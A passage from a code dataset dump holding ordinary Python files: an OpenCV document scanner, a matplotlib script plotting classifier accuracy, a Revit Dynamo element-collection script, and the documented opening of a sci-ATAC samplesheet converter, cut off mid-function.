= 1)\n\trect[0] = pts[np.argmin(s)]\n\trect[2] = pts[np.argmax(s)]\n\tdiff = np.diff(pts, axis = 1)\n\trect[1] = pts[np.argmin(diff)]\n\trect[3] = pts[np.argmax(diff)]\n\treturn rect\n\ndef four_point_transform(image, pts):\n\trect = order_points(pts)\n\t(tl, tr, br, bl) = rect\n\twidthA = np.sqrt(((br[0] - bl[0]) ** 2) + ((br[1] - bl[1]) ** 2))\n\twidthB = np.sqrt(((tr[0] - tl[0]) ** 2) + ((tr[1] - tl[1]) ** 2))\n\tmaxWidth = max(int(widthA), int(widthB))\n\theightA = np.sqrt(((tr[0] - br[0]) ** 2) + ((tr[1] - br[1]) ** 2))\n\theightB = np.sqrt(((tl[0] - bl[0]) ** 2) + ((tl[1] - bl[1]) ** 2))\n\tmaxHeight = max(int(heightA), int(heightB))\n\tdst = np.array([\n\t\t[0, 0],\n\t\t[maxWidth - 1, 0],\n\t\t[maxWidth - 1, maxHeight - 1],\n\t\t[0, maxHeight - 1]], dtype = \"float32\")\n\tM = cv2.getPerspectiveTransform(rect, dst)\n\twarped = cv2.warpPerspective(image, M, (maxWidth, maxHeight))\n\treturn warped\n\ndef translate(image, x, y):\n\tM = np.float32([[1, 0, x], [0, 1, y]])\n\tshifted = cv2.warpAffine(image, M, (image.shape[1], image.shape[0]))\n\treturn shifted\n\ndef rotate(image, angle, center = None, scale = 1.0):\n\t(h, w) = image.shape[:2]\n\tif center is None:\n\t\tcenter = (w / 2, h / 2)\n\tM = cv2.getRotationMatrix2D(center, angle, scale)\n\trotated = cv2.warpAffine(image, M, (w, h))\n\treturn rotated\n\ndef resize(image, width = None, height = None, inter = cv2.INTER_AREA):\n\tdim = None\n\t(h, w) = image.shape[:2]\n\tif width is None and height is None:\n\t\treturn image\n\tif width is None:\n\t\tr = height / float(h)\n\t\tdim = (int(w * r), height)\n\telse:\n\t\tr = width / float(w)\n\t\tdim = (width, int(h * r))\n\tresized = cv2.resize(image, dim, interpolation = inter)\n\treturn resized\n\ndef get_doc(file):\n image = cv2.imread(file)\n ratio = image.shape[0] / 500.0\n orig = image.copy()\n image = resize(image, height = 500)\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n gray = cv2.GaussianBlur(gray, (5,5), 0)\n retval, thresh = cv2.threshold(gray, 127, 255, cv2.THRESH_BINARY)\n edged = cv2.Canny(thresh, 70, 200)\n (_, cnts, _) = cv2.findContours(edged, cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)\n cnts = sorted(cnts, key = cv2.contourArea, reverse = True)[:5]\n for c in cnts:\n \tperi = cv2.arcLength(c, True)\n \tapprox = cv2.approxPolyDP(c, 0.02 * peri, True)\n \tif len(approx) == 4:\n \t\tscreenCnt = approx\n \t\tbreak\n cv2.drawContours(image, [screenCnt], -1, (0, 255, 0), 2)\n warped = four_point_transform(orig, screenCnt.reshape(4, 2) * ratio)\n warped = cv2.cvtColor(warped, cv2.COLOR_BGR2GRAY)\n retval, warped = cv2.threshold(warped, 127, 255, cv2.THRESH_BINARY)\n warped = resize(warped, 1000)\n return warped\n\nif __name__ == '__main__':\n doc = get_doc('images/docscanner/page.jpg')\n cv2.imshow('doc', doc)\n \n\n\n","repo_name":"edeane/learning-opencv-stuff","sub_path":"docscanner.py","file_name":"docscanner.py","file_ext":"py","file_size_in_byte":3044,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"88"} +{"seq_id":"27866896065","text":"import numpy as np\nfrom matplotlib import pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nimport scipy.stats as st\n\nkernels = ['poly', 'rbf', 'linear', 'sigmoid']\nf_svm=[0.47, 0.56, 0.47, 0.47]\na_svm=[.54,.62,.54,.54]\n# nn_data = np.load('results.npz')\n# nn_data2 = np.load('results2.npz')\n# acc = np.concatenate((nn_data['acc'],nn_data2['acc']),axis=0)\n# acc_test = np.concatenate((nn_data['acc_test'],nn_data2['acc_test']),axis=0)\nnn_data3 = 
np.load('results4.npz')\nf1scores = nn_data3['f1scores']\nacc_test = nn_data3['acc_test']\n# fig, ax = plt.subplots(1,7, sharey=True)\n# fig.suptitle('Neurons per layer, 3 layers')\n# for i in range(7):\n# ax[i].plot(acc[1,i])\n# ax[i].set_title(f'{(i+4)*2}')\n# ax[0].set_ylabel('Accuracy')\n\nplt.figure()\nplt.bar(kernels, f_svm)\nplt.title('Accuracy per kernel')\nplt.xlabel('Kernel')\nplt.ylabel('Accuracy')\n\nfig, ax = plt.subplots(2, 4, sharey=True, sharex=True)\nfig.suptitle('Number of layers vs. number of neurons and accuracy/F1')\nax[0,0].set_ylabel('Accuracy')\nax[1,0].set_ylabel('F1-score')\n\n# f=open('out.csv','a')\n# f.write('Acc_avg,acc_std,f1_avg,f1_se\\n')\nfor i in range(4):\n at_avg=np.average(acc_test, axis=1)\n at_se=st.t.interval(0.95, df=acc_test.shape[1]-1, loc=np.mean(acc_test[i,:]), scale=st.sem(acc_test[i,:]))\n f1_avg=np.average(f1scores, axis=1)\n f1_se=st.t.interval(0.95, df=acc_test.shape[1]-1, loc=np.mean(f1scores[i,:]), scale=st.sem(f1scores[i,:]))\n\n # f.write('{:.4f},{:.4f},{:.4f},{:.4f}\\n'.format(at_avg[i],at_avg[i]-at_se[0],f1_avg[i],f1_avg[i]-f1_se[0]))\n ax[0,i].plot(np.arange(8,22,2),acc_test[i,:])\n ax[0,i].set_title(f'{i+2}')\n ax[1,i].set_xlabel('Neurons per layer')\n ax[1,i].plot(np.arange(8,22,2), f1scores[i,:])\n\n ax[0,i].plot(15,at_avg[i], 'ko')\n ax[0,i].hlines(at_se[0],14,16,'k')\n ax[0,i].hlines(at_se[1],14,16,'k')\n ax[0,i].vlines(15,at_se[0],at_se[1],'k')\n\n ax[1,i].plot(15,f1_avg[i], 'ko')\n ax[1,i].hlines(f1_se[0],14,16,'k')\n ax[1,i].hlines(f1_se[1],14,16,'k')\n ax[1,i].vlines(15,f1_se[0],f1_se[1],'k')\n # red = ax[0,i].hlines(0.51, 8,22, 'r')\n # green = ax[1,i].hlines(0.49, 8,22, 'g')\n# f.close()\n# plt.figlegend([red, green], ['1 sigma accuracy upper bound', '1 sigma F1 upper bound'])\n\nxv, yv = np.meshgrid(np.arange(8,22,2),np.arange(4)+2)\nxvf = xv.flatten()\nyvf = yv.flatten()\nnparams = np.zeros(acc_test.shape[0]*acc_test.shape[1])\nacc_flat = acc_test.flatten()\nnparams = (xvf**2+1) * yvf\n\n# plt.figure()\n# plt.scatter(nparams, acc_flat)\n\n# fig2 = plt.figure()\n# ax = fig2.add_subplot(111, projection='3d')\n# print(xv.shape)\n# print(f1scores.shape)\n# ax.plot_wireframe(xv, yv, f1scores)\n\nplt.show()","repo_name":"qscgy/csds458-final-proj","sub_path":"plots.py","file_name":"plots.py","file_ext":"py","file_size_in_byte":2661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"88"} +{"seq_id":"5878023688","text":"# Load the Python Standard and DesignScript Libraries\nimport sys,os,time,tempfile,shutil\nimport clr\nclr.AddReference('ProtoGeometry')\nfrom Autodesk.DesignScript.Geometry import *\nfrom Autodesk.DesignScript.Geometry import Point as pt\nfrom Autodesk.DesignScript.Geometry import Line as ln\nfrom Autodesk.DesignScript.Geometry import Polygon as pg\nfrom Autodesk.DesignScript.Geometry import Curve as cr\nclr.AddReference('RevitAPI')\nfrom Autodesk.Revit.DB import *\nclr.AddReference('RevitAPIUI')\nfrom Autodesk.Revit.UI import TaskDialog\nclr.AddReference(\"RevitNodes\")\nimport Revit\nclr.ImportExtensions(Revit.Elements)\nclr.AddReference(\"RevitServices\")\nimport RevitServices\nfrom RevitServices.Persistence import DocumentManager\nfrom RevitServices.Transactions import TransactionManager\nfrom System.Collections.Generic import *\nclr.ImportExtensions(Revit.GeometryConversion)\nclr.AddReference(\"DSCoreNodes\")\nclr.AddReference('DynamoServices')\nfrom Dynamo.Events import 
*\n#---------------------------------------------------------------------------------------------#\n#---------------------------------------------------------------------------------------------#\n#---------------------------------------------------------------------------------------------#\n#---------------------------------------------------------------------------------------------#\n\ndef flatten(t):\n return [item for sublist in t for item in sublist]\t\n\ndef getAllElementsOfCategory(doc,cat):\n\t\"\"\"Lấy tất cả các phần tử thuộc Category\n\tcates (list)\n\toc : Revit Document\t\"\"\"\t\n\tcategories = doc.Settings.Categories\t\t\n\tfor c in categories:\n\t\tif c.Name == cat:\t\t\t\t\t\n\t\t\treturn list(FilteredElementCollector(doc).OfCategoryId(c.Id).WhereElementIsNotElementType().ToElements())\n\n\ndef browse_element(doc,cat,param = None):\n\t\"\"\"\t\"\"\"\t\n\tdebugger = []\n\texceptions = []\n\tcategories = doc.Settings.Categories\t\t\n\tfor c in categories:\n\t\ttry:\n\t\t\tif c.Name == cat:\t\t\t\t\t\n\t\t\t\telements = list(FilteredElementCollector(doc).OfCategoryId(c.Id).WhereElementIsNotElementType().ToElements())\n\t\t\t\tfor e in elements:\n\t\t\t\t\ttry:\n\t\t\t\t\t\tparam_winumber = e.LookupParameter(param)\n\t\t\t\t\t\twi_number = param_winumber.AsString()\n\t\t\t\t\t\tif wi_number.strip() != \"\":\n\t\t\t\t\t\t\tdebugger.append(wi_number)\n\n\t\t\t\t\texcept Exception as ex:\n\t\t\t\t\t\texceptions.append(ex)\n\t\t\t\t\t\tpass\n\t\texcept Exception as ex:\n\t\t\texceptions.append(ex)\n\t\t\tpass\n\treturn debugger#, exceptions\n\ndef get_dyn_path():\n\treturn ExecutionEvents.ActiveSession.CurrentWorkspacePath\ndef get_revit_dir():\n\treturn os.getcwd()\n\ndef get_temp_dir():\n\ttempDir = tempfile.gettempdir()\n\treturn tempDir\n\ndef get_temp_file_path(fileName):\n\ttempDir = tempfile.gettempdir()\n\ttempFP = tempDir + fileName\n\treturn tempFP\n# def run_cmd(cmd_command):\n# \"\"\"example: py C:\\\\Users\\\\tvpduy\\\\py_logistic\\\\monitor_master.py\"\"\"\n# cmd_call = f\"start /B start cmd.exe @cmd /k {cmd_command}...\"\n# os.system(cmd_call)\n#---------------------------------------------------------------------------------------------#\n#---------------------------------------------------------------------------------------------#\n#---------------------------------------------------------------------------------------------#\n#---------------------------------------------------------------------------------------------#\ndoc = DocumentManager.Instance.CurrentDBDocument\nuiapp = DocumentManager.Instance.CurrentUIApplication\napp = uiapp.Application\n\ncates = IN[0].splitlines()\nparam_work_item_number = IN[1]\nschedule_txt_path = IN[2]\n\n\n# elements = flatten([getAllElementsOfCategory(doc,cat) for cat in cates])\n\nwith open(schedule_txt_path,'r') as f:\n\tOUT = f.readlines()\n# OUT = get_revit_dir(), get_dyn_path() # flatten([browse_element(doc,cat,param_work_item_number) for cat in cates])\n","repo_name":"JoeyTran87/py_dynamo_revit","sub_path":"py_dynamo/date_by_workitemnumber.py","file_name":"date_by_workitemnumber.py","file_ext":"py","file_size_in_byte":3749,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"88"} +{"seq_id":"4046095890","text":"#!/usr/bin/env python3\n\n#\n# Notes:\n# o the master file is bbi-sciatac-demux/samplesheet/sciatac_samplesheet.py\n\n\"\"\"\nProgram: sciatac_samplesheet.py\nSummary:\n This program reads a (front-end) CSV spreadsheet file, performs a variety of\n checks, 'fixes' sample 
names, and writes a 'back-end' samplesheet file for\n use with the processing pipeline. There are two back-end samplesheet formats:\n Andrew Hill's sci-ATAC pipeline samplesheet format and a JSON format file\n required by the BBI sci-ATAC pipeline.\n\nInput (front-end) samplesheet format:\n o the input samplesheet file is a CSV format spreadsheet file (use a\n spreadsheet program to create the CSV file)\n o checks rows\n o checks the first eight cells in each row and trims off additional cells\n o ignores rows with all empty cells\n o reports an error if there are both empty and non-empty cells amongst\n the first six (the last two cells in a non-header row may be empty)\n o the first row is a header with the following required columns\n o n5 barcode identifier with possible values: 'n5_wells' or 'n5_indexes'\n o n7 barcode identifier with possible values: 'n7_wells' or 'n7_indexes'\n o p5 barcode identifier with possible values: 'p5_wells' or 'p5_indexes'\n or 'p5_columns'. If the p5 identifier is p5_columns, then the p7\n identifier must be p7_rows.\n o p7 barcode identifier with possible values: 'p7_wells' or 'p7_indexes'\n or 'p7_rows'. If the p7 identifier is p7_rows, then the p5\n identifier must be p5_columns.\n o sample name identifier with value: 'sample_name'\n o genome label identifier with value: 'genome'\n o peak_group (called peaks are merged by peak group)\n o peak_file (a bed file of peaks; will be merged with called peaks if the\n peak_group value has non-zero length)\n and the following optional column\n o wrap_group the name of the group to which the results will\n be distributed. This information is used by the bbi-sciatac-wrap\n script. Valid names consist of lower and upper case alphabetic\n characters, numerals, and the symbols '.', '_', and '-'. Cells may\n be empty in which case those samples are excluded from the wrap.\n o the column order is arbitrary (but must be consistent within the file)\n o the header values do not depend on case\n o ranges: index, well, column, and row range values are separated by either\n '-' or ':', your choice (mixes are allowed)\n examples:\n o 3-5\n o 3:5\n o 3-5,7:12\n o multiple barcode values: multiple indexes, wells, columns, and rows (and\n ranges) are separated by ','\n examples:\n o indexes: 1-5,7,89-96\n o wells: P1-A10,P1-A11\n o rows: E,F,G\n o columns: 3,7,12\n o sample names:\n o begin with an alphabetic character: a-z and A-Z\n o allowed characters are alphabetic (a-z and A-Z), numeric (0-9), and\n period '.'\n o this program converts other characters in the sample name to '.',\n and then checks for sample name degeneracy. If there is, the program\n exits immediately.\n o genomes:\n o recognized genome names are listed in the variable 'genome_name_list'\n in this program's code. If a samplesheet genome name is not in the\n list, sciatac_samplesheet.py gives a warning in case the name is\n mis-spelled.\n o genome is the name of the organism that was sequenced. This\n identifies the files required to analyze the reads. The genome string\n is passed to the processing pipeline, and the pipeline uses it to\n find required files. 
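 (A minimal sketch of what this implies, assuming genomes.json is a
 JSON array of objects -- its exact schema is not specified in this
 document, only the 'name' field is:

 import json
 # path as given in this documentation
 with open('bbi-sciatac-analyze/genomes.json') as f:
 genomes = json.load(f)
 # the samplesheet 'genome' cell must equal one 'name' value
 entry = next(g for g in genomes if g['name'] == 'human')

 Hypothetical illustration only; the pipeline itself performs the
 actual lookup.)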
Available genomes are defined by the 'name'\n field in the bbi-sciatac-analyze/genomes.json file.\n o peak groups\n o the called peaks of samples with the same peak group name are merged\n prior to downstream analysis\n o a sample peak group string (cell) may be empty\n o peak group names consist of alphabetic, positive integers, and\n underscore characters\n o each sample must have a peak_group or a peak_file or both\n o if both a peak group and peak file are specified, the peaks in\n the peak bed file are merged with the called peaks in the group\n during the pipeline run\n o peak files\n o an absolute path to a peak bed file (it must begin with '/')\n o a sample peak file string (cell) is empty when no peak\n file is wanted for the sample\n o each sample must have a peak_group or a peak_file or both\n o if both a peak group and peak file are specified, the peaks in\n the peak bed file are merged with the called peaks in the group\n during the pipeline run\n o wells:\n o samplesheet wells are converted to indexes where indexes refer to\n physical wells, which are in the order used in Andrew's pipeline;\n that is, N7 and P7 indexes increase by column number along each row\n and N5 and P5 indexes increase by row letter down each column\n o wells that include a plate identifier can have either '-' or ':'\n separating the plate and well, your choice (mixes within a range are\n allowed)\n examples:\n o P1-A10\n o P1:A10\n o wells are given as single or ranges of wells separated by commas.\n examples:\n o A01-A12,B01:B12\n o P1:A01-P1:A12,P2-A01:P2-A12\n o when the same set of wells is used from all four plates for a sample,\n use 'P*' for the plate number\n example:\n o P*:A01-P*:A04 is the same as P1:A01-P1:A04,P2:A01-P2:A04,P3:A01-P3:A04,P4:A01-P4:A04\n o wells names do not depend on case\n examples:\n o P1-A10\n o p1-a10\n o indexes:\n o indexes are given as single or ranges of integer well indexes\n separated by commas.\n example:\n o 3,5-8,89:96\n o indexes refer to physical wells in the order used in Andrew's\n pipeline and range from 1 to 384. Indexes 1 to 96 refer to\n plate 1, 97 to 192 to plate 2, and so on, for P5, P7, N5, and\n N7.\n o p7 rows:\n o u-titer plate rows used for PCR reactions\n o rows are given as single or ranges of rows separated by commas\n examples:\n o E,F,G\n o D-F,H\n o p5 columns:\n o u-titer plate columns used for PCR reactions\n o columns are given as single or ranges of columns separated\n by commas\n examples:\n o 3,4,5\n o 3-5,10-12\n o p7 rows and p5 columns:\n o by default, the i-th p7 row is paired with the i-th p5 column.\n No other combinations of specified rows and columns are considered.\n Consequently, the order of the rows and columns must be correct.\n Technical notes:\n o for each sample, the ATAC-seq pipeline takes all combinations\n of the P7 and P5 indices specified for the sample. Consequently,\n if the P7 rows were given as A-B and the P5 columns were given\n as 1-2 in the input CSV file, and this program passed the\n corresponding indices directly to the pipeline, the pipeline\n would accept PCR index pairs for row/column pairs A/1, A/2,\n B/1, and B/2.\n o in order to restrict the PCR index combinations to one P7 row\n and one P5 column, this program expands the number of spreadsheet\n rows per sample by the number of P7 rows given for the sample in\n the input CSV file. 
For example, if for sample 'sample_1' the\n p7_rows specification is 'A-B' and the p5_columns is '6,5', this\n program generates (internally) two rows for 'sample_1', the\n first with PCR row column pair A/6 and the second with PCR\n row/column pair B/5.\n o p7 wells and p5 wells\n o this program converts wells to indices and passes the indices to\n the pipeline. The pipeline uses combinations of all p7 and p5\n wells. The order of the wells is unimportant.\n o name the barnyard sample 'Barnyard' for compatibility with the\n experiment dashboard\n\n Example samplesheet file:\n\n N7_indexes,N5_wells,P7_rows,P5_columns,sample_name,genome,peak_group,peak_file,wrap_group\n 1:96,P1-A01:P1-H01,\"E,F,G\",\"1,2,3\",sample.1,mouse,group_1,,Smith\n 1:96,P1-A02:P1-H02,\"E,F,G\",\"1,2,3\",sample.2,human,group_2,,Jones\n 1:96,P1-A03:P1-H03,\"E,F,G\",\"1,2,3\",sample.3,mouse,group_1,,Smith\n 1:96,P1-A04:P1-H04,\"E,F,G\",\"1,2,3\",sample.4,human,group_2,,/home/me/my_peaks.bed,Jones\n 1:96,P1-A05:P1-H05,\"E,F,G\",\"1,2,3\",sample.5,human,group_2,,Jones\n 1:96,P1-A06:P1-H06,\"E,F,G\",\"1,2,3\",sample.6,mouse,group_1,,Smith\n 1:96,P1-A07:P1-H07,\"E,F,G\",\"1,2,3\",sample.7,mouse,group_1,,Smith\n 1:96,P1-A08:P1-H08,\"E,F,G\",\"1,2,3\",sample.8,mouse,group_1,,Smith\n 1:96,P1-A09:P1-H09,\"E,F,G\",\"1,2,3\",sample.9,mouse,group_1,,Smith\n 1:96,P1-A10:P1-A10,\"E,F,G\",\"1,2,3\",sample.10,human,group_2,,Jones\n 1:96,P1-A11:P1-H11,\"E,F,G\",\"1,2,3\",sample.11,human,group_2,,Jones\n 1:96,P1-A12:P1-H12,\"E,F,G\",\"1,2,3\",sample.12,barnyard,group_3,,\n \n Notes:\n o the p7_row and p5_column value sets are enclosed in quotes\n in this example because the sets have commas. Do not use\n quotes in the spreadsheet program cells; the spreadsheet\n program adds them when it writes the CSV file.\n\nCommand line options:\n\n Option Description\n ------ -----------\n --use_all_barcodes By default, the BBI sci-ATAC processing pipeline uses only\n informative barcodes to assign reads to samples. In this\n description, a barcode is one of the four sequences N5, N7,\n P5, P7 (for ligation and PCR reactions). These four\n barcodes identify the read. If a barcode uses the same\n index set for all samples, it is considered to be\n uninformative for the purpose of identifying the sample,\n so it is not used to identify the sample. In the example\n samplesheet above, the N7, P5, and P7 index sets are the\n same for all samples so only the N5 indexes are used to\n identify samples. This is safe unless the sequencing run\n includes samples that are not present in the samplesheet\n and those additional samples are distinguished by barcode\n index sets that appear to be uninformative based on the\n samplesheet information. 
Use this option when there are\n such additional samples in the sequencing run.\n\nNotes:\n o the command line arguments -r, -l, -w, -t, -s, and --use_all_barcodes\n are used only with the JSON samplesheet format.\n\n\nFor help with command line parameters, run\n\nsciatac_samplesheet.py -h\n\nwhich gives\n\nusage: sciatac_samplesheet.py [-h] [-i INPUT] [-o OUTPUT] [-f {json,index}]\n [-r RUN_DIR] [-l {2,3}] [-w {96,384}] [-t]\n [-s {n5,n7}] [--use_all_barcodes] [-e] [-d] [-v]\n\nA program to convert sci-ATAC CSV samplesheet to pipeline samplesheet.\n\noptional arguments:\n -h, --help show this help message and exit\n -i INPUT, --input INPUT\n Input CSV samplesheet filename (required string).\n -o OUTPUT, --output OUTPUT\n Output samplesheet filename (required string).\n -f {json,index}, --format {json,index}\n Output file format (default: 'json') (optional\n string).\n -r RUN_DIR, --run_dir RUN_DIR\n Illumina run directory path (optional string).\n -l {2,3}, --level {2,3}\n Two or three level sci-ATAC-seq experiment (default:\n 3) (optional integer).\n -w {96,384}, --number_wells {96,384}\n Number of barcode set wells (default: 384) (optional\n integer).\n -t, --tn5_barcodes Tn5 has barcodes (optional flag).\n -s {n5,n7}, --sample_identifier {n5,n7}\n Ligation barcode that identifies the sample (default:\n 'n5') used to check for duplicates (optional string).\n --use_all_barcodes Use all barcodes to demultiplex fastq files. By\n default, uninformative barcodes are not used to\n identify samples when demultiplexing fastq files\n (optional flag).\n -e, --template Write template samplesheet file\n ('samplesheet.template.csv') with standard column\n formats and exit (optional flag).\n -d, --documentation Display documentation and exit (optional flag).\n -v, --version Give program and JSON output file versions and exit\n (optional flag).\n\"\"\"\n\n\nimport sys\nimport re\nimport csv\nimport json\nimport argparse\n\n#\n# Samplesheet JSON file version.\n#\nprogram_version = '4.1.1'\njson_file_version = '3.1.1'\n\n#\n# List of recognizable genome names.\n# This program issues a warning if a samplesheet genome is\n# not in this list.\n#\ngenome_name_list = [\n 'arabidopsis',\n 'barnyard',\n 'bat',\n 'cat',\n 'chicken',\n 'corn',\n 'cow',\n 'cynomolgus',\n 'dog',\n 'drosophila',\n 'duck',\n 'elephant',\n 'horse',\n 'human',\n 'macaque',\n 'mouse',\n 'opossum',\n 'pig',\n 'rabbit',\n 'rat',\n 'snake',\n 'worm',\n 'zebrafish',\n 'hg19',\n 'mm19',\n 'hg19_mm9'\n]\n\n\n#\n# List of recognizable CSV column header names.\n# These are used to check labels in the file.\n# The n5, n7, p5, and p7 names are assigned to\n# individual strings for error reporting.\n#\nn5_column_names = 'n5_wells n5_indexes'\nn7_column_names = 'n7_wells n7_indexes'\np5_column_names = 'p5_wells p5_indexes p5_columns'\np7_column_names = 'p7_wells p7_indexes p7_rows'\n\ncolumn_header_name_list = [ 'sample_name', 'genome', 'peak_group', 'peak_file', 'wrap_group' ]\ncolumn_header_name_list.extend( n5_column_names.split() )\ncolumn_header_name_list.extend( n7_column_names.split() )\ncolumn_header_name_list.extend( p5_column_names.split() )\ncolumn_header_name_list.extend( p7_column_names.split() )\n\ncolumns_required_list = [ 'n5', 'n7', 'p5', 'p7', 'sample_name', 'genome', 'peak_group', 'peak_file' ]\ncolumns_optional_list = [ 'wrap_group' ]\n\n#\n# Columns that may have empty cells. 
This is used to prevent\n# errors when testing for empty cells in check_rows().\n#\ncolumn_allow_empty_cell = [ 'peak_group', 'peak_file', 'wrap_group' ]\n\n\ndef display_documentation():\n print( __doc__ )\n return( 0 )\n\n\ndef check_args( args ):\n error_string = ''\n if( args.tn5_barcodes and ( args.number_wells == 384 or args.level == 3 ) ):\n error_string += ' tn5_barcodes requires level == 2 and number_wells == 96\\n'\n if( len( error_string ) > 0 ):\n print( 'Command line argument errors:' )\n print( error_string, file=sys.stderr )\n sys.exit( -1 )\n return( 0 )\n\n\ndef parse_header_column_name( string_in, column_name_list, error_string ):\n \"\"\"\n Split column header name into a 'type' and a 'format' and store as dictionary in column_name_list.\n \"\"\"\n if( not string_in.lower() in column_header_name_list ):\n error_string += ' %s' % ( string_in )\n return( column_name_list, error_string )\n string_in = string_in.lower()\n if( string_in == 'sample_name' ):\n column_name_dict = { 'type': 'sample_name', 'format': None }\n elif( string_in == 'genome' ):\n column_name_dict = { 'type': 'genome', 'format': None }\n elif( string_in == 'peak_group' ):\n column_name_dict = { 'type': 'peak_group', 'format': None }\n elif( string_in == 'peak_file' ):\n column_name_dict = { 'type': 'peak_file', 'format': None }\n elif( string_in == 'wrap_group' ):\n column_name_dict = { 'type': 'wrap_group', 'format': None }\n else:\n mobj = re.match( r'([np][57])_(wells|indexes|rows|columns)', string_in )\n column_name_dict = { 'type': mobj.group( 1 ), 'format': mobj.group( 2 ) }\n column_name_list.append( column_name_dict )\n return( column_name_list, error_string )\n\n\ndef check_header_column_names( column_name_list ):\n \"\"\"\n Check column header names.\n Notes:\n o check that required columns occur\n o check that each allowed column type occurs once\n o check that if either p5 or p7 are specified by columns and rows, then both are.\n \"\"\"\n columns_allowed = {}\n for column_name in columns_required_list:\n columns_allowed[column_name] = 0\n for column_name in columns_optional_list:\n columns_allowed[column_name] = 0\n for column_name_dict in column_name_list:\n columns_allowed[column_name_dict['type']] += 1\n error_flag = 0\n # Check for n5, n7, p5, and p7 specification columns.\n for column_name in columns_allowed:\n if( columns_allowed[column_name] == 0 and column_name not in columns_optional_list ):\n print( 'Error: column for \\'%s\\' missing.' % ( column_name ), file=sys.stderr )\n if( column_name == 'n5' ):\n print( ' acceptable n5 header values: %s' % ( n5_column_names ), file=sys.stderr )\n elif( column_name == 'n7' ):\n print( ' acceptable n7 header values: %s' % ( n7_column_names ), file=sys.stderr )\n elif( column_name == 'p5' ):\n print( ' acceptable p5 header values: %s' % ( p5_column_names ), file=sys.stderr )\n elif( column_name == 'p7' ):\n print( ' acceptable p7 header values: %s' % ( p7_column_names ), file=sys.stderr )\n error_flag = 1\n elif( columns_allowed[column_name] > 1 ):\n print( 'Error: column for \\'%s\\' occurs %d times.' 
% ( column_name, columns_allowed[column_name] ), file=sys.stderr )\n error_flag = 1\n if( error_flag ):\n sys.exit( -1 )\n p5_col = False\n p7_row = False\n for column_name_dict in column_name_list:\n if( column_name_dict['type'] == 'p5' and column_name_dict['format'] == 'columns' ):\n p5_col = True\n if( column_name_dict['type'] == 'p7' and column_name_dict['format'] == 'rows' ):\n p7_row = True\n if( p5_col != p7_row ):\n print( 'Error: p5 is %sin \\'columns\\' format but p7 is %sin \\'rows\\' format' % ( '' if p5_col else 'not ', '' if p7_row else 'not ' ), file=sys.stderr )\n sys.exit( -1 )\n return( 0 )\n\n\ndef parse_header( row_header ):\n \"\"\"\n Convert column header (row) into a list of column name dictionaries.\n The dictionary has the elements\n key value description\n type entry type name: n5, n7, p5, p7, sample_name, genome, peak_group, peak_file\n format barcode format values: wells, indexes, rows, columns, None (see column_header_name_list for allowed combinations of type and format)\n \"\"\"\n column_name_list = []\n error_string = ''\n for str in row_header:\n column_name_list, error_string = parse_header_column_name( str, column_name_list, error_string )\n if(len(error_string) > 0):\n print('Error: invalid header label(s): %s' % (error_string))\n sys.exit(-1)\n check_header_column_names( column_name_list )\n return( column_name_list )\n\n\ndef well_to_index( plate, row, column, across_row_first=True, element_coordinates=[None,None] ):\n \"\"\"\n Convert a well specification to a plate index in the range P1:A01=1 to P4:H12=384.\n\n Args:\n plate integer plate number between 1 and 4\n row character row (A-H)\n column integer column number (1-12)\n across_row_first bool index increases by one as a row is traversed; that is,\n moving from column to column along row\n Returns:\n index: an integer well index (1-384)\n\n \"\"\"\n row = row.lower()\n if( plate < 1 or plate > 4 or\n not row in [ 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h' ] or\n column < 1 or column > 12 ):\n print( 'Error: spreadsheet cell: %s%s: bad well values: plate: %d row: %s col: %d' % ( element_coordinates[0], element_coordinates[1], plate, row, column ), file=sys.stderr )\n sys.exit( -1 )\n irow = ord( row ) - ord( 'a' )\n icol = column - 1\n if( across_row_first ):\n well_index = irow * 12 + icol + 1\n else:\n well_index = icol * 8 + irow + 1\n return( well_index + ( plate - 1 ) * 96 )\n\n\ndef pad_well_col(well_col, zero_pad, id_length):\n if zero_pad:\n template = '%%0%sd' % id_length\n else:\n template = '%s'\n col_id = template % (well_col)\n return col_id\n\n\ndef index_to_well( well_index, across_row_first ):\n nrow = 8\n ncol = 12\n ipl = int( well_index / 96 )\n i96 = well_index - ipl * 96\n if across_row_first:\n well_row = chr(65 + int(i96 / ncol))\n well_col = (i96 % ncol) + 1\n else:\n well_row = chr(65 + (i96 % nrow))\n well_col = int(i96 / nrow) + 1\n\n# well_id = 'P%d-%s%s' % (ipl + 1, well_row, pad_well_col(well_col, zero_pad_col, id_length))\n well_id = '%s%s' % ( well_row, pad_well_col( well_col, True, 2 ) )\n\n return( well_id )\n\n\ndef check_index_list( index_list, element_coordinates = [ None, None ] ):\n \"\"\"\n Check and clean index list\n o check for duplicate indexes\n o remove duplicate indexes\n \"\"\"\n index_dict = {}\n for i in index_list:\n index_dict.setdefault( i, 0 )\n index_dict[i] += 1\n duplicate_list = []\n for i in index_dict.keys():\n if( index_dict[i] > 1 ):\n duplicate_list.append( str( i ) )\n if( len( duplicate_list ) > 0 ):\n print( 'Warning: spreadsheet cell: 
%s %s: duplicate well index(es): %s' % ( element_coordinates[0], element_coordinates[1], ' '.join( sorted(duplicate_list) ) ), file=sys.stderr )\n print( ' These indexes are duplicated within the reported spreadsheet cell, which may be intentional.')\n return( list( set( index_list ) ) )\n\n\ndef make_index_string( index_list ):\n \"\"\"\n Convert a list of (integer) barcode well indexes to an index string where\n o repeated indexes are dropped; that is, keep only distinct indexes\n o sequences of counting numbers are expressed as ranges, for example, 5 6 7 8 9 => 5-9\n o indexes and index ranges are separated by commas\n \"\"\"\n index_string = ''\n index_list.sort()\n index_prev = None\n index1 = None\n for i in index_list:\n if( index_prev ):\n if( i == index_prev ):\n continue\n elif( i > index_prev + 1 ):\n if( len( index_string ) > 0 ):\n index_string += ','\n if( index_prev > index1 ):\n index_string += '%d-%d' % ( index1, index_prev )\n else:\n index_string += '%d' % ( index_prev )\n index1 = i\n else:\n index1 = i\n index_prev = i\n # last index in list\n if( len( index_string ) > 0 ):\n index_string += ','\n if( index_prev > index1 ):\n index_string += '%d-%d' % ( index1, index_prev )\n else:\n index_string += '%d' % ( index_prev )\n return( index_string )\n\n\ndef parse_indexes( string_in, max_index = 96, element_coordinates = [ 